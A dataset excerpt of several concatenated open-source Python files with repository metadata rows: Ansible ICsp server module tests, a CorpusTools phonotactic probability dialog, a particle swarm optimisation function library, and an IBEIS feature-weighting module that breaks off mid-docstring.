except Exception as e:
assert "message" == e.args[0]
else:
pytest.fail("Expected Exception was not raised")
def test_should_not_try_delete_server_when_it_is_already_absent(self):
self.mock_connection.get.return_value = {'members': []}
self.mock_server_service.delete_server.return_value = {}
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_ABSENT)
ICspServerModule().run()
self.mock_server_service.delete_server.assert_not_called()
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=False,
msg=ICspServerModule.SERVER_ALREADY_ABSENT
)
def test_should_delete_server(self):
self.mock_connection.get.return_value = SERVERS
self.mock_server_service.delete_server.return_value = {}
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_ABSENT)
ICspServerModule().run()
self.mock_server_service.delete_server.assert_called_once_with("/uri/239")
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=True,
msg="Server '/uri/239' removed successfully from ICsp."
)
def test_should_fail_with_all_exe_attr_when_HPICspException_raised_on_delete(self):
self.mock_connection.get.return_value = SERVERS
exeption_value = {"message": "Fake Message", "details": "Details", "errorCode": "INVALID_RESOURCE"}
self.mock_server_service.delete_server.side_effect = HPICspInvalidResource(exeption_value)
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_ABSENT)
ICspServerModule().run()
# Load called args and convert to dict to prevent str comparison with different reordering (Python 3.5)
fail_json_args_msg = self.mock_ansible_instance.fail_json.call_args[1]['msg']
error_raised = json.loads(fail_json_args_msg)
assert error_raised == exeption_value
def test_should_fail_with_args_joined_when_common_exception_raised_on_delete(self):
self.mock_connection.get.return_value = SERVERS
self.mock_server_service.delete_server.side_effect = Exception("Fake Message", "INVALID_RESOURCE")
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_ABSENT)
ICspServerModule().run()
self.mock_ansible_instance.fail_json.assert_called_once_with(msg='Fake Message; INVALID_RESOURCE')
def test_should_configure_network(self):
self.mock_connection.get.side_effect = [SERVERS, SERVERS]
self.mock_connection.post.return_value = JOB_RESOURCE
self.mock_server_service.get_server.return_value = DEFAULT_SERVER
self.mock_ansible_instance.params = yaml.load(YAML_NETWORK_CONFIGURED)
ICspServerModule().run()
network_config_state = yaml.load(YAML_NETWORK_CONFIGURED)
network_config = {
"serverData": [
{"serverUri": DEFAULT_SERVER['uri'], "personalityData": network_config_state['server_personality_data'],
"skipReboot": True}],
"failMode": None,
"osbpUris": []
}
uri = '/rest/os-deployment-jobs/?writeOnly=true'
self.mock_connection.post.assert_called_once_with(uri, network_config)
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=True,
msg=ICspServerModule.CUSTOM_ATTR_NETWORK_UPDATED,
ansible_facts=dict(target_server=DEFAULT_SERVER)
)
def test_should_fail_when_try_configure_network_without_inform_personality_data(self):
self.mock_connection.get.return_value = SERVERS
self.mock_server_service.get_server.return_value = DEFAULT_SERVER
params_config_network = yaml.load(YAML_NETWORK_CONFIGURED)
params_config_network['server_personality_data'] = {}
self.mock_ansible_instance.params = params_config_network
ICspServerModule().run()
self.mock_ansible_instance.fail_json.assert_called_once_with(msg=ICspServerModule.SERVER_PERSONALITY_DATA_REQUIRED)
def test_should_fail_when_try_configure_network_for_not_found_server(self):
self.mock_connection.get.return_value = {'members': []}
self.mock_ansible_instance.params = yaml.load(YAML_NETWORK_CONFIGURED)
ICspServerModule().run()
self.mock_ansible_instance.exit_json.assert_called_once_with(changed=False,
msg=ICspServerModule.SERVER_NOT_FOUND)
def test_expect_exception_not_caught_when_configure_network_raise_exception(self):
self.mock_connection.get.return_value = SERVERS
self.mock_connection.post.side_effect = Exception("message")
self.mock_ansible_instance.params = yaml.load(YAML_NETWORK_CONFIGURED)
try:
hpe_icsp_server_main()
except Exception as e:
assert "message" == e.args[0]
else:
pytest.fail("Expected Exception was not raised")
if __name__ == '__main__':
pytest.main([__file__])
| apache-2.0 | -3,992,395,171,992,851,500 | 34.727891 | 123 | 0.647944 | false |
PhonologicalCorpusTools/CorpusTools | corpustools/gui/ppgui.py | 1 | 16303 | import os
from collections import OrderedDict
from .imports import *
from corpustools.phonoprob.phonotactic_probability import (phonotactic_probability,
phonotactic_probability_all_words)
from corpustools.neighdens.io import load_words_neighden
from corpustools.corpus.classes import Attribute
from corpustools.exceptions import PCTError, PCTPythonError
from .windows import FunctionWorker, FunctionDialog
from .widgets import (RadioSelectWidget, FileWidget, TierWidget, RestrictedContextWidget)
from .corpusgui import AddWordDialog
from corpustools.contextmanagers import (CanonicalVariantContext,
MostFrequentVariantContext)
from corpustools import __version__
class PPWorker(FunctionWorker):
def run(self):
kwargs = self.kwargs
self.results = []
context = kwargs.pop('context')
if context == RestrictedContextWidget.canonical_value:
cm = CanonicalVariantContext
elif context == RestrictedContextWidget.frequent_value:
cm = MostFrequentVariantContext
corpus = kwargs['corpusModel'].corpus
st = kwargs['sequence_type']
tt = kwargs['type_token']
att = kwargs.get('attribute', None)
ft = kwargs['frequency_cutoff']
log_count = kwargs['log_count']
with cm(corpus, st, tt, attribute=att, frequency_threshold = ft, log_count=log_count) as c:
try:
if 'query' in kwargs:
for q in kwargs['query']:
res = phonotactic_probability(c, q,
algorithm = kwargs['algorithm'],
probability_type = kwargs['probability_type'],
stop_check = kwargs['stop_check'],
call_back = kwargs['call_back'])
if self.stopped:
break
self.results.append([q,res])
else:
end = kwargs['corpusModel'].beginAddColumn(att)
phonotactic_probability_all_words(c,
algorithm = kwargs['algorithm'],
probability_type = kwargs['probability_type'],
#num_cores = kwargs['num_cores'],
stop_check = kwargs['stop_check'],
call_back = kwargs['call_back'])
end = kwargs['corpusModel'].endAddColumn(end)
except PCTError as e:
self.errorEncountered.emit(e)
return
except Exception as e:
e = PCTPythonError(e)
self.errorEncountered.emit(e)
return
if self.stopped:
self.finishedCancelling.emit()
return
self.dataReady.emit(self.results)
class PPDialog(FunctionDialog):
header = ['Corpus',
'PCT ver.',
'Word',
'Analysis name',
'Algorithm',
'Probability type',
'Transcription tier',
'Frequency type',
'Log-scaled frequency',
'Pronunciation variants',
'Minimum word frequency',
'Result']
_about = [('This function calculates the phonotactic probability '
'of a word based on positional probabilities of single '
'segments and biphones derived from a corpus.'),
'',
'References: ',
('Vitevitch, Michael S. & Paul A. Luce. 2004.'
' A Web-based interface to calculate phonotactic'
' probability for words and nonwords in English.'
' Behavior Research Methods, Instruments, & Computers 36 (3), 481-487')
]
name = 'phonotactic probability'
def __init__(self, parent, settings, corpusModel, inventory, showToolTips):
FunctionDialog.__init__(self, parent, settings, PPWorker())
self.corpusModel = corpusModel
self.inventory = inventory
self.showToolTips = showToolTips
pplayout = QHBoxLayout()
algEnabled = {'Vitevitch && Luce':True}
self.algorithmWidget = RadioSelectWidget('Phonotactic probability algorithm',
OrderedDict([
('Vitevitch && Luce','vitevitch'),
]),
{'Vitevitch && Luce':self.vitevitchSelected,
},
algEnabled)
pplayout.addWidget(self.algorithmWidget)
queryFrame = QGroupBox('Query')
vbox = QFormLayout()
self.compType = None
self.oneWordRadio = QRadioButton('Calculate for one word')
self.oneWordRadio.clicked.connect(self.oneWordSelected)
self.oneWordRadio.setAutoExclusive(True)
self.oneWordEdit = QLineEdit()
self.oneWordEdit.textChanged.connect(self.oneWordRadio.click)
self.oneWordRadio.setChecked(True)
self.oneWordRadio.click()
self.oneNonwordRadio = QRadioButton('Calculate for a word/nonword not in the corpus')
self.oneNonwordRadio.clicked.connect(self.oneNonwordSelected)
self.oneNonwordRadio.setAutoExclusive(True)
self.oneNonwordLabel = QLabel('None created')
self.oneNonword = None
self.oneNonwordButton = QPushButton('Create word/nonword')
self.oneNonwordButton.clicked.connect(self.createNonword)
self.fileRadio = QRadioButton('Calculate for list of words')
self.fileRadio.clicked.connect(self.fileSelected)
self.fileRadio.setAutoExclusive(True)
self.fileWidget = FileWidget('Select a file', 'Text file (*.txt *.csv)')
self.fileWidget.textChanged.connect(self.fileRadio.click)
self.allwordsRadio = QRadioButton('Calculate for all words in the corpus')
self.allwordsRadio.clicked.connect(self.allwordsSelected)
self.allwordsRadio.setAutoExclusive(True)
self.columnEdit = QLineEdit()
self.columnEdit.setText('Phonotactic probability')
self.columnEdit.textChanged.connect(self.allwordsRadio.click)
vbox.addRow(self.oneWordRadio)
vbox.addRow(self.oneWordEdit)
vbox.addRow(self.oneNonwordRadio)
vbox.addRow(self.oneNonwordLabel,self.oneNonwordButton)
vbox.addRow(self.fileRadio)
vbox.addRow(self.fileWidget)
vbox.addRow(self.allwordsRadio)
vbox.addRow(QLabel('Column name:'),self.columnEdit)
note = QLabel(('(Selecting this option will add a new column containing the results to your corpus. '
'No results window will be displayed.)'))
note.setWordWrap(True)
vbox.addRow(note)
queryFrame.setLayout(vbox)
pplayout.addWidget(queryFrame)
optionFrame = QGroupBox('Options')
optionLayout = QVBoxLayout()
self.useLogScale = QCheckBox('Use log-scaled word frequencies (token count only)')
optionLayout.addWidget(self.useLogScale)
self.useLogScale.setChecked(True)
self.tierWidget = TierWidget(self.corpusModel.corpus,include_spelling=False)
optionLayout.addWidget(self.tierWidget)
self.typeTokenWidget = RadioSelectWidget('Type or token',
OrderedDict([('Count types','type'),
('Count tokens','token')]))
for widget in self.typeTokenWidget.widgets:
if 'token' in widget.text():
#we can only use log-scaling on token frequency
widget.clicked.connect(lambda x: self.useLogScale.setEnabled(True))
else:
#if type frequency is selected, then disable to log-scale option
widget.clicked.connect(lambda y: self.useLogScale.setEnabled(False))
self.typeTokenWidget.widgets[1].click()
#normally we do self.typeTokenWidget.initialClick()
#but here we default to token, not type, because that's in the original algorithim by V&L
actions = None
self.variantsWidget = RestrictedContextWidget(self.corpusModel.corpus, actions)
optionLayout.addWidget(self.variantsWidget)
optionLayout.addWidget(self.typeTokenWidget)
self.probabilityTypeWidget = RadioSelectWidget('Probability type',
OrderedDict([
('Biphone','bigram'),
('Single-phone','unigram')]))
optionLayout.addWidget(self.probabilityTypeWidget)
##----------------------
minFreqFrame = QGroupBox('Minimum frequency')
box = QFormLayout()
self.minFreqEdit = QLineEdit()
box.addRow('Minimum word frequency:',self.minFreqEdit)
minFreqFrame.setLayout(box)
optionLayout.addWidget(minFreqFrame)
##----------------------
optionFrame.setLayout(optionLayout)
pplayout.addWidget(optionFrame)
ppFrame = QFrame()
ppFrame.setLayout(pplayout)
self.layout().insertWidget(0,ppFrame)
self.algorithmWidget.initialClick()
self.algorithmWidget.initialClick()
if self.showToolTips:
self.tierWidget.setToolTip(("<FONT COLOR=black>"
'Select whether to calculate neighborhood density'
' on the spelling of a word (perhaps more useful for morphological purposes)'
' or any transcription tier of a word (perhaps more useful for phonological purposes),'
' in the corpus.'
"</FONT>"))
self.useLogScale.setToolTip(("<FONT COLOR=black>"
'If checked, then the token frequency count will be log-scaled. This option does not apply to type'
' frequency.'
"</FONT>"))
def createNonword(self):
dialog = AddWordDialog(self, self.corpusModel.corpus, self.inventory)
if dialog.exec_():
self.oneNonword = dialog.word
self.oneNonwordLabel.setText('{} ({})'.format(str(self.oneNonword),
str(self.oneNonword.transcription)))
self.oneNonwordRadio.click()
def oneWordSelected(self):
self.compType = 'one'
def oneNonwordSelected(self):
self.compType = 'nonword'
def fileSelected(self):
self.compType = 'file'
def allwordsSelected(self):
self.compType = 'all'
def generateKwargs(self):
##------------------
try:
frequency_cutoff = float(self.minFreqEdit.text())
except ValueError:
frequency_cutoff = 0.0
##-------------------
kwargs = {'corpusModel':self.corpusModel,
'algorithm': self.algorithmWidget.value(),
'context': self.variantsWidget.value(),
'sequence_type':self.tierWidget.value(),
'type_token':self.typeTokenWidget.value(),
'frequency_cutoff':frequency_cutoff,
'probability_type':self.probabilityTypeWidget.value(),
'log_count': self.useLogScale.isEnabled() and self.useLogScale.isChecked()}
if self.compType is None:
reply = QMessageBox.critical(self,
"Missing information", "Please specify a comparison type.")
return
elif self.compType == 'one':
text = self.oneWordEdit.text()
if not text:
reply = QMessageBox.critical(self,
"Missing information", "Please specify a word.")
return
try:
w = self.corpusModel.corpus.find(text)
except KeyError:
reply = QMessageBox.critical(self,
"Invalid information", "The spelling specified does match any words in the corpus.")
return
kwargs['query'] = [w]
elif self.compType == 'nonword':
if self.oneNonword is None:
reply = QMessageBox.critical(self,
"Missing information", "Please create a word/nonword.")
return
if not getattr(self.oneNonword,kwargs['sequence_type']):
reply = QMessageBox.critical(self,
"Missing information", "Please recreate the word/nonword with '{}' specified.".format(self.tierWidget.displayValue()))
return
kwargs['query'] = [self.oneNonword]
elif self.compType == 'file':
path = self.fileWidget.value()
if not path:
reply = QMessageBox.critical(self,
"Missing information", "Please enter a file path.")
return
if not os.path.exists(path):
reply = QMessageBox.critical(self,
"Invalid information", "The file path entered was not found.")
return
kwargs['query'] = list()
text = load_words_neighden(path)
for t in text:
if isinstance(t,str):
try:
w = self.corpusModel.corpus.find(t)
except KeyError:
reply = QMessageBox.critical(self,
"Invalid information", "The spelling '{}' was not found in the corpus.".format(t))
return
kwargs['query'].append(w)
elif self.compType == 'all':
column = self.columnEdit.text()
if column == '':
reply = QMessageBox.critical(self,
"Missing information", "Please enter a column name.")
return
colName = column.replace(' ','_')
attribute = Attribute(colName,'numeric',column)
if column in self.corpusModel.columns:
msgBox = QMessageBox(QMessageBox.Warning, "Duplicate columns",
"'{}' is already the name of a column. Overwrite?".format(column), QMessageBox.NoButton, self)
msgBox.addButton("Overwrite", QMessageBox.AcceptRole)
msgBox.addButton("Cancel", QMessageBox.RejectRole)
if msgBox.exec_() != QMessageBox.AcceptRole:
return
kwargs['attribute'] = attribute
return kwargs
def setResults(self, results):
self.results = []
try:
frequency_cutoff = float(self.minFreqEdit.text())
except ValueError:
frequency_cutoff = 0.0
for result in results:
w, pp = result
self.results.append({'Corpus': self.corpusModel.corpus.name,
'PCT ver.': __version__,#self.corpusModel.corpus._version,
'Analysis name': self.name.capitalize(),
'Word': str(w),
'Algorithm': self.algorithmWidget.displayValue().replace('&&','&'),
'Probability type': self.probabilityTypeWidget.displayValue(),
'Transcription tier': self.tierWidget.displayValue(),
'Frequency type': self.typeTokenWidget.value().title(),
'Log-scaled frequency': 'Yes' if self.useLogScale.isChecked() else 'No',
'Pronunciation variants': self.variantsWidget.value().title(),
'Minimum word frequency': frequency_cutoff,
'Result': pp})
def vitevitchSelected(self):
self.probabilityTypeWidget.enable()
self.typeTokenWidget.enable()
| bsd-3-clause | 7,514,661,540,657,869,000 | 43.181572 | 142 | 0.5518 | false |
avanwyk/cipy | cipy/algorithms/pso/functions.py | 1 | 9569 | # Copyright 2016 Andrich van Wyk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Collection of functions used to implement the PSO algorithm.
"""
import numpy as np
from cipy.algorithms.core import comparator
from cipy.algorithms.pso.types import Particle
def std_position(position, velocity):
"""
Standard particle position update according to the equation:
:math:`x_{ij}(t+1) = x_{ij}(t) + \
v_{ij}(t),\\;\\;\\forall\\; j \\in\\; \\{1,...,n\\}`
Args:
position (numpy.array): The current position.
velocity (numpy.array): The particle velocity.
Returns:
numpy.array: The calculated position.
"""
return position + velocity
def std_velocity(particle, social, state):
"""
Standard particle velocity update according to the equation:
:math:`v_{ij}(t+1) &= \\omega v_{ij}(t) + \
c_1 r_{1j}(t)[y_{ij}(t) - x_{ij}(t)]\\:+ \
c_2 r_{2j}(t)[\\hat{y}_{ij}(t) - x_{ij}(t)],\\;\\;\
\\forall\\; j \\in\\; \\{1,...,n\\}`
If a v_max parameter is supplied (state.params['v_max'] is not None) the
returned velocity is clamped to v_max.
Args:
particle (cipy.algorithms.pso.types.Particle): Particle to update the
velocity for.
social (numpy.array): The social best for the
particle.
state (cipy.algorithms.pso.types.State): The PSO algorithm state.
Returns:
numpy.array: The calculated velocity, clamped to state.params['v_max'].
"""
inertia = state.params['inertia']
c_1, c_2 = state.params['c_1'], state.params['c_2']
v_max = state.params['v_max']
size = particle.position.size
c1r1 = __acceleration__(state.rng, c_1, size)
c2r2 = __acceleration__(state.rng, c_2, size)
velocity = __std_velocity_equation__(inertia, c1r1, c2r2, particle, social)
return __clamp__(velocity, v_max)
def __std_velocity_equation__(inertia, c1r1, c2r2, particle, social):
return (inertia * particle.velocity +
c1r1 * (particle.best_position - particle.position) +
c2r2 * (social - particle.position))
def __acceleration__(rng, coefficient, size):
return rng.uniform(0.0, coefficient, size)
def __clamp__(velocity, v_max):
return velocity if v_max is None else np.clip(velocity, -v_max, v_max)
def gc_velocity_update(particle, social, state):
""" Guaranteed convergence velocity update.
Args:
particle: cipy.algorithms.pso.Particle: Particle to update the velocity
for.
social: cipy.algorithms.pso.Particle: The social best for the particle.
state: cipy.algorithms.pso.State: The state of the PSO algorithm.
Returns:
numpy.ndarray: the calculated velocity.
"""
gbest = state.swarm[gbest_idx(state.swarm)].position
if not np.array_equal(gbest, particle.position):
return std_velocity(particle, social, state)
rho = state.params['rho']
inertia = state.params['inertia']
v_max = state.params['v_max']
size = particle.position.size
r2 = state.rng.uniform(0.0, 1.0, size)
velocity = __gc_velocity_equation__(inertia, rho, r2, particle, gbest)
return __clamp__(velocity, v_max)
def __gc_velocity_equation__(inertia, rho, r2, particle, gbest):
return (-1 * particle.position + gbest + inertia *
particle.velocity + rho * (1 - 2 * r2))
def std_parameter_update(state, objective_function):
return state
def initialize_particle(rng, domain, fitness_function):
""" Initializes a particle within a domain.
Args:
rng: numpy.random.RandomState: The random number generator.
domain: cipy.problems.core.Domain: The domain of the problem.
Returns:
cipy.algorithms.pso.Particle: A new, fully initialized particle.
"""
position = rng.uniform(domain.lower, domain.upper, domain.dimension)
fitness = fitness_function(position)
return Particle(position=position,
velocity=np.zeros(domain.dimension),
fitness=fitness,
best_fitness=fitness,
best_position=position)
def update_fitness(objective_function, particle):
""" Calculates and updates the fitness and best_fitness of a particle.
Fitness is calculated using the 'problem.fitness' function.
Args:
problem: The optimization problem encapsulating the fitness function
and optimization type.
particle: cipy.algorithms.pso.Particle: Particle to update the fitness
for.
Returns:
cipy.algorithms.pso.Particle: A new particle with the updated fitness.
"""
fitness = objective_function(particle.position)
best_fitness = particle.best_fitness
cmp = comparator(fitness)
if best_fitness is None or cmp(fitness, best_fitness):
best_position = particle.position
return particle._replace(fitness=fitness,
best_fitness=fitness,
best_position=best_position)
else:
return particle._replace(fitness=fitness)
def update_particle(position_update, velocity_update, state, nbest_topology,
idx_particle):
""" Update function for a particle.
Calculates and updates the velocity and position of a particle for a
single iteration of the PSO algorithm. Social best particle is determined
by the state.params['topology'] function.
Args:
state: cipy.algorithms.pso.State: The state of the PSO algorithm.
nbest_topology: dict: Containing neighbourhood best index for each
particle index.
idx_particle: tuple: Tuple of the index of the particle and the
particle itself.
Returns:
cipy.algorithms.pso.Particle: A new particle with the updated position
and velocity.
"""
(idx, particle) = idx_particle
nbest = state.swarm[nbest_topology[idx]].best_position
velocity = velocity_update(particle, nbest, state)
position = position_update(particle.position, velocity)
return particle._replace(position=position, velocity=velocity)
def gbest_topology(state):
gbest = gbest_idx(state.swarm)
return __topology__(state.swarm, lambda i: gbest)
def gbest_idx(swarm):
""" gbest Neighbourhood topology function.
Args:
swarm: list: The list of particles.
Returns:
int: The index of the gbest particle.
"""
best = 0
cmp = comparator(swarm[best].best_fitness)
for (idx, particle) in enumerate(swarm):
if cmp(particle.best_fitness, swarm[best].best_fitness):
best = idx
return best
def lbest_topology(state):
return __topology__(state.swarm, lambda i: lbest_idx(state, i))
def lbest_idx(state, idx):
""" lbest Neighbourhood topology function.
Neighbourhood size is determined by state.params['n_s'].
Args:
state: cipy.algorithms.pso.State: The state of the PSO algorithm.
idx: int: index of the particle in the swarm.
Returns:
int: The index of the lbest particle.
"""
swarm = state.swarm
n_s = state.params['n_s']
cmp = comparator(swarm[0].best_fitness)
indices = __lbest_indices__(len(swarm), n_s, idx)
best = None
for i in indices:
if best is None or cmp(swarm[i].best_fitness, swarm[best].best_fitness):
best = i
return best
def __lbest_indices__(size, n_s, idx):
start = idx - (n_s // 2)
idxs = []
for k in range(n_s):
idxs.append((start + k) % size)
return idxs
def update_rho(state, objective_function):
params = state.params
rho = params['rho']
e_s = params['e_s']
e_f = params['e_f']
successes = params.get('successes', 0)
failures = params.get('failures', 0)
global_best = solution(state.swarm)
fitness = objective_function(global_best.position)
cmp = comparator(global_best.best_fitness)
if cmp(fitness, global_best.best_fitness):
successes += 1
failures = 0
else:
failures += 1
successes = 0
if successes > e_s:
rho *= 2
elif failures > e_f:
rho *= 0.5
else:
rho = rho
params['rho'] = rho
params['successes'] = successes
params['failures'] = failures
return state._replace(params=params)
def solution(swarm):
""" Determines the global best particle in the swarm.
Args:
swarm: iterable: an iterable that yields all particles in the swarm.
Returns:
cipy.algorithms.pso.Particle: The best particle in the swarm when
comparing the best_fitness values of the particles.
"""
best = swarm[0]
cmp = comparator(best.best_fitness)
for particle in swarm:
if cmp(particle.best_fitness, best.best_fitness):
best = particle
return best
def fitness_measurement(state):
swarm = state.swarm
return 'fitness', swarm[gbest_idx(swarm)].best_fitness
def __topology__(swarm, social_best):
return dict([(idx, social_best(idx)) for idx in range(len(swarm))])
| apache-2.0 | 3,489,454,286,974,073,300 | 29.669872 | 80 | 0.64479 | false |
SU-ECE-17-7/ibeis | _broken/preproc_featweight.py | 1 | 13024 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
# Python
from six.moves import zip, range, map # NOQA
# UTool
import utool as ut
import vtool as vt
#import vtool.image as vtimage
import numpy as np
from ibeis.algo.preproc import preproc_probchip
from os.path import exists
# Inject utool functions
(print, rrr, profile) = ut.inject2(__name__, '[preproc_featweight]')
def test_featweight_worker():
"""
test function
python -m ibeis.algo.preproc.preproc_featweight --test-gen_featweight_worker --show --cnn
"""
import ibeis
qreq_ = ibeis.main_helpers.testdata_qreq_(defaultdb='PZ_MTEST', p=['default:fw_detector=cnn'], qaid_override=[1])
ibs = qreq_.ibs
config2_ = qreq_.qparams
lazy = True
aid_list = qreq_.qaids
#aid_list = ibs.get_valid_aids()[0:30]
kpts_list = ibs.get_annot_kpts(aid_list)
chipsize_list = ibs.get_annot_chip_sizes(aid_list, config2_=config2_)
probchip_fpath_list = preproc_probchip.compute_and_write_probchip(ibs,
aid_list,
lazy=lazy,
config2_=config2_)
print('probchip_fpath_list = %r' % (probchip_fpath_list,))
probchip_list = [vt.imread(fpath, grayscale=True) if exists(fpath) else None
for fpath in probchip_fpath_list]
_iter = list(zip(aid_list, kpts_list, probchip_list, chipsize_list))
_iter = ut.InteractiveIter(_iter, enabled=ut.get_argflag('--show'))
for aid, kpts, probchip, chipsize in _iter:
#kpts = kpts_list[0]
#aid = aid_list[0]
#probchip = probchip_list[0]
#chipsize = chipsize_list[0]
tup = (aid, kpts, probchip, chipsize)
(aid, weights) = gen_featweight_worker(tup)
if aid == 3 and ibs.get_dbname() == 'testdb1':
# Run Asserts if not interactive
weights_03_test = weights[0:3]
print('weights[0:3] = %r' % (weights_03_test,))
#weights_03_target = [ 0.098, 0.155, 0.422]
#weights_03_target = [ 0.324, 0.407, 0.688]
#weights_thresh = [ 0.09, 0.09, 0.09]
#ut.assert_almost_eq(weights_03_test, weights_03_target, weights_thresh)
ut.assert_inbounds(weights_03_test, 0, 1)
if not ut.show_was_requested():
break
if ut.show_was_requested():
import plottool as pt
#sfx, sfy = (probchip.shape[1] / chipsize[0], probchip.shape[0] / chipsize[1])
#kpts_ = vt.offset_kpts(kpts, (0, 0), (sfx, sfy))
pnum_ = pt.make_pnum_nextgen(1, 3) # *pt.get_square_row_cols(4))
fnum = 1
pt.figure(fnum=fnum, doclf=True)
###
pt.imshow(ibs.get_annot_chips(aid, config2_=config2_), pnum=pnum_(0), fnum=fnum)
if ut.get_argflag('--numlbl'):
pt.gca().set_xlabel('(1)')
###
pt.imshow(probchip, pnum=pnum_(2), fnum=fnum)
if ut.get_argflag('--numlbl'):
pt.gca().set_xlabel('(2)')
#pt.draw_kpts2(kpts_, ell_alpha=.4, color_list=pt.ORANGE)
###
#pt.imshow(probchip, pnum=pnum_(3), fnum=fnum)
#color_list = pt.draw_kpts2(kpts_, weights=weights, ell_alpha=.7, cmap_='jet')
#cb = pt.colorbar(weights, color_list)
#cb.set_label('featweights')
###
pt.imshow(ibs.get_annot_chips(aid, config2_=qreq_.qparams), pnum=pnum_(1), fnum=fnum)
#color_list = pt.draw_kpts2(kpts, weights=weights, ell_alpha=.3, cmap_='jet')
color_list = pt.draw_kpts2(kpts, weights=weights, ell_alpha=.3)
cb = pt.colorbar(weights, color_list)
cb.set_label('featweights')
if ut.get_argflag('--numlbl'):
pt.gca().set_xlabel('(3)')
#pt.draw_kpts2(kpts, ell_alpha=.4)
pt.draw()
pt.show_if_requested()
def gen_featweight_worker(tup):
"""
Function to be parallelized by multiprocessing / joblib / whatever.
Must take in one argument to be used by multiprocessing.map_async
Args:
tup (aid, tuple(kpts(ndarray), probchip_fpath )): keypoints and probability chip file path
aid, kpts, probchip_fpath
CommandLine:
python -m ibeis.algo.preproc.preproc_featweight --test-gen_featweight_worker --show
python -m ibeis.algo.preproc.preproc_featweight --test-gen_featweight_worker --show --dpath figures --save ~/latex/crall-candidacy-2015/figures/gen_featweight.jpg
python -m ibeis.algo.preproc.preproc_featweight --test-gen_featweight_worker --show --db PZ_MTEST --qaid_list=1,2,3,4,5,6,7,8,9
Example:
>>> # DISABLE_DOCTEST
>>> from ibeis.algo.preproc.preproc_featweight import * # NOQA
>>> test_featweight_worker()
Ignore::
import plottool as pt
pt.imshow(probchip_list[0])
patch_list = [vt.patch.get_warped_patch(probchip, kp)[0].astype(np.float32) / 255.0 for kp in kpts[0:1]]
patch_ = patch_list[0].copy()
patch = patch_
patch = patch_[-20:, :20, 0]
import vtool as vt
gaussian_patch = vt.gaussian_patch(patch.shape[1], patch.shape[0], shape=patch.shape[0:2], norm_01=False)
import cv2
sigma = 1/10
xkernel = (cv2.getGaussianKernel(patch.shape[1], sigma))
ykernel = (cv2.getGaussianKernel(patch.shape[0], sigma))
#ykernel = ykernel / ykernel.max()
#xkernel = ykernel / xkernel.max()
gaussian_kern2 = ykernel.dot(xkernel.T)
print(gaussian_kern2.sum())
patch2 = patch.copy()
patch2 = np.multiply(patch2, ykernel)
patch2 = np.multiply(patch2.T, xkernel).T
if len(patch3.shape) == 2:
patch3 = patch.copy() * gaussian_patch[:,:]
else:
patch3 = patch.copy() * gaussian_patch[:,:, None]
sum2 = patch2.sum() / (patch2.size)
sum3 = patch3.sum() / (patch3.size)
print(sum2)
print(sum3)
fig = pt.figure(fnum=1, pnum=(1, 3, 1), doclf=True, docla=True)
pt.imshow(patch * 255)
fig = pt.figure(fnum=1, pnum=(1, 3, 2))
pt.imshow(gaussian_kern2 * 255.0)
fig = pt.figure(fnum=1, pnum=(1, 3, 3))
pt.imshow(patch2 * 255.0)
pt.update()
"""
(aid, kpts, probchip, chipsize) = tup
if probchip is None:
# hack for undetected chips. SETS ALL FEATWEIGHTS TO .25 = 1/4
weights = np.full(len(kpts), .25, dtype=np.float32)
else:
sfx, sfy = (probchip.shape[1] / chipsize[0], probchip.shape[0] / chipsize[1])
kpts_ = vt.offset_kpts(kpts, (0, 0), (sfx, sfy))
#vt.patch.get_warped_patches()
patch_list = [vt.patch.get_warped_patch(probchip, kp)[0].astype(np.float32) / 255.0
for kp in kpts_]
weight_list = [vt.patch.gaussian_average_patch(patch) for patch in patch_list]
#weight_list = [patch.sum() / (patch.size) for patch in patch_list]
weights = np.array(weight_list, dtype=np.float32)
return (aid, weights)
def compute_fgweights(ibs, aid_list, config2_=None):
"""
Example:
>>> # SLOW_DOCTEST
>>> from ibeis.algo.preproc.preproc_featweight import * # NOQA
>>> import ibeis
>>> ibs = ibeis.opendb('testdb1')
>>> aid_list = ibs.get_valid_aids()[1:2]
>>> config2_ = None
>>> featweight_list = compute_fgweights(ibs, aid_list)
>>> result = np.array_str(featweight_list[0][0:3], precision=3)
>>> print(result)
[ 0.125 0.061 0.053]
"""
nTasks = len(aid_list)
print('[preproc_featweight.compute_fgweights] Preparing to compute %d fgweights' % (nTasks,))
probchip_fpath_list = preproc_probchip.compute_and_write_probchip(ibs,
aid_list,
config2_=config2_)
chipsize_list = ibs.get_annot_chip_sizes(aid_list, config2_=config2_)
#if ut.DEBUG2:
# from PIL import Image
# probchip_size_list = [Image.open(fpath).size for fpath in probchip_fpath_list] # NOQA
# #with ut.embed_on_exception_context:
# # does not need to happen anymore
# assert chipsize_list == probchip_size_list, 'probably need to clear chip or probchip cache'
kpts_list = ibs.get_annot_kpts(aid_list, config2_=config2_)
# Force grayscale reading of chips
probchip_list = [vt.imread(fpath, grayscale=True) if exists(fpath) else None
for fpath in probchip_fpath_list]
print('[preproc_featweight.compute_fgweights] Computing %d fgweights' % (nTasks,))
arg_iter = zip(aid_list, kpts_list, probchip_list, chipsize_list)
featweight_gen = ut.generate(gen_featweight_worker, arg_iter,
nTasks=nTasks, ordered=True, freq=10)
featweight_param_list = list(featweight_gen)
#arg_iter = zip(aid_list, kpts_list, probchip_list)
#featweight_param_list1 = [gen_featweight_worker((aid, kpts, probchip)) for
#aid, kpts, probchip in arg_iter]
#featweight_aids = ut.get_list_column(featweight_param_list, 0)
featweight_list = ut.get_list_column(featweight_param_list, 1)
print('[preproc_featweight.compute_fgweights] Done computing %d fgweights' % (nTasks,))
return featweight_list
def generate_featweight_properties(ibs, feat_rowid_list, config2_=None):
"""
Args:
ibs (IBEISController):
fid_list (list):
Returns:
featweight_list
CommandLine:
python -m ibeis.algo.preproc.preproc_featweight --test-generate_featweight_properties
